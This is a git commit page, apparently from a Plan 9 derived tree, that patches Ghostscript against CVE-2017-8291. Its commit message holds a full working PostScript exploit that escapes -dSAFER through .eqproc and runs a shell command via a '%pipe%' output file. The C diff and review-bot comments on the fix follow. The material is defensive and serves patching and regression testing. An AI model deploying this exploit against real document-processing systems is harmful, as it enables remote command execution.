author | cinap_lenrek <cinap_lenrek@felloff.net> | 2019-06-21 18:57:20 +0200 |
---|---|---|
committer | cinap_lenrek <cinap_lenrek@felloff.net> | 2019-06-21 18:57:20 +0200 |
commit | 0af7d1fe35093690f2d8dd0613b3bf3b777674c6 (patch) | |
tree | 4b310ac78bd2759bcaf134b5def49931cc753ef4 /sys | |
parent | b767b2ce23ba8294d7e628b7fbcd0ad844be5dc8 (diff) |
gs: apply mitigations against CVE-2017-8291 (thanks jsmoody)
To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def
%/bigarr 65000 array def
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def
enlarge array aload
{
.eqproc
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf
.
Diffstat (limited to 'sys')
-rw-r--r-- | sys/src/cmd/gs/src/zfrsd.c | 22 | ||||
-rw-r--r-- | sys/src/cmd/gs/src/zmisc3.c | 6 |
2 files changed, 21 insertions, 7 deletions
diff --git a/sys/src/cmd/gs/src/zfrsd.c b/sys/src/cmd/gs/src/zfrsd.c
index ddff62162..17d3fb78a 100644
--- a/sys/src/cmd/gs/src/zfrsd.c
+++ b/sys/src/cmd/gs/src/zfrsd.c
@@ -47,13 +47,19 @@ zrsdparams(i_ctx_t *i_ctx_p)
 ref *pFilter;
 ref *pDecodeParms;
 int Intent;
- bool AsyncRead;
+ bool AsyncRead = false;
 ref empty_array, filter1_array, parms1_array;
 uint i;
- int code;
+ int code = 0;
+
+ if (ref_stack_count(&o_stack) < 1)
+ return_error(e_stackunderflow);
+ if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+ return_error(e_typecheck);
 
 make_empty_array(&empty_array, a_readonly);
- if (dict_find_string(op, "Filter", &pFilter) > 0) {
+ if (r_has_type(op, t_dictionary)
+ && dict_find_string(op, "Filter", &pFilter) > 0) {
 if (!r_is_array(pFilter)) {
 if (!r_has_type(pFilter, t_name))
 return_error(e_typecheck);
@@ -92,10 +98,12 @@ zrsdparams(i_ctx_t *i_ctx_p)
 return_error(e_typecheck);
 }
 }
- if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
- (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
- )
- return code;
+ if (r_has_type(op, t_dictionary))
+ code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+ if (r_has_type(op, t_dictionary))
+ if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+ return code;
 push(1);
 op[-1] = *pFilter;
 if (pDecodeParms)
diff --git a/sys/src/cmd/gs/src/zmisc3.c b/sys/src/cmd/gs/src/zmisc3.c
index 228932476..e9f056de6 100644
--- a/sys/src/cmd/gs/src/zmisc3.c
+++ b/sys/src/cmd/gs/src/zmisc3.c
@@ -55,6 +55,12 @@ zeqproc(i_ctx_t *i_ctx_p)
 ref2_t stack[MAX_DEPTH + 1];
 ref2_t *top = stack;
 
+ if (ref_stack_count(&o_stack) < 2)
+ return_error(e_stackunderflow);
+ if (!r_is_array(op - 1) || !r_is_array(op)) {
+ return_error(e_typecheck);
+ }
+
 make_array(&stack[0].proc1, 0, 1, op - 1);
 make_array(&stack[0].proc2, 0, 1, op);
 for (;;) { |
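Review bot: In the first zrsdparams hunk, `Intent`, `pFilter` and `pDecodeParms` still have no initializer, although the new type check lets a null operand through and the guarded `dict_find_string` lookup is then skipped. The hunk gives `AsyncRead` and `code` defaults for this case, so the other locals should follow suit, for example `int Intent = 0;` and `ref *pDecodeParms = NULL;`. Whether `pFilter` is always assigned before `op[-1] = *pFilter;` depends on an else branch outside the hunk, and that should be confirmed for the null case. A short comment above the two new checks stating that a null operand is accepted deliberately would also help the next reader.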
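Review bot: In the second zrsdparams hunk the result of `dict_int_param` for "Intent" is no longer tested: `code` is assigned and then overwritten by the `dict_bool_param` call, so an error the removed code returned for a bad Intent is now dropped silently. Add `if (code < 0) return code;` directly after the Intent lookup, or, if an out-of-range value is meant to be tolerated, test `code != e_rangecheck` as well and say so in a comment. The nested `if` around `dict_bool_param` would read better as one braced `if (r_has_type(op, t_dictionary))` block covering both lookups. The function continues outside the hunk.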
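Review bot: The new operand checks in zeqproc carry no comment explaining why they exist, and the two `if` statements are braced inconsistently. I would add a comment above them such as `/* .eqproc is callable from untrusted PostScript: verify operand count and types before op[-1] and op are used as arrays. */` and drop the braces around the single `return_error(e_typecheck);` to match the first check. The PostScript file in the commit message would make a useful regression input, with a stackunderflow or typecheck error as the expected outcome. zeqproc's body continues outside the hunk.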